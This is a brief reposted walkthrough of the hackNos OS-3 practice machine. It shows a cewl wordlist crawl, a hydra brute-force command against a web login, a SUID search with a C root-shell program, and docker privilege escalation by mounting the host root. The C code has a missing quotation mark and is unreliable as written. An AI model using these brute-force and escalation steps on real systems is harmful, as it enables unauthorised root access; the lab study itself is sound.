码迷,mamicode.com
首页 > 其他好文 > 详细

os-hackos-3-docker提权

时间:2021-01-04 10:56:16      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:roo   main   admin   Cewl   wrong   页面   chroot   form   hack   

0x00

cewl http://192.168.43.179/websec/爬取页面所有的单词做成字典

hydra -l contact@hacknos.com -P cewl.txt 192.168.43.179 http-post-form "/websec/admin:username=^USER^&password=^PASS^:Wrong email or password" 超强爆破

0x01

find /usr/bin -type f -perm -u=s 2>/dev/null
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc,char *argv[])
{
setreuid(0,0);
execve("/bin/bash,NULL,NULL);
} 
gcc suid.c -o exp

docker提权

docker run -v /:/mnt --rm -it alpine chroot /mnt sh搞个容器先

dokcer images + ID 389fef711851
docker run -it -v /:/mbt +ID

os-hackos-3-docker提权

标签:roo   main   admin   Cewl   wrong   页面   chroot   form   hack   

原文地址:https://www.cnblogs.com/dem0/p/14213140.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!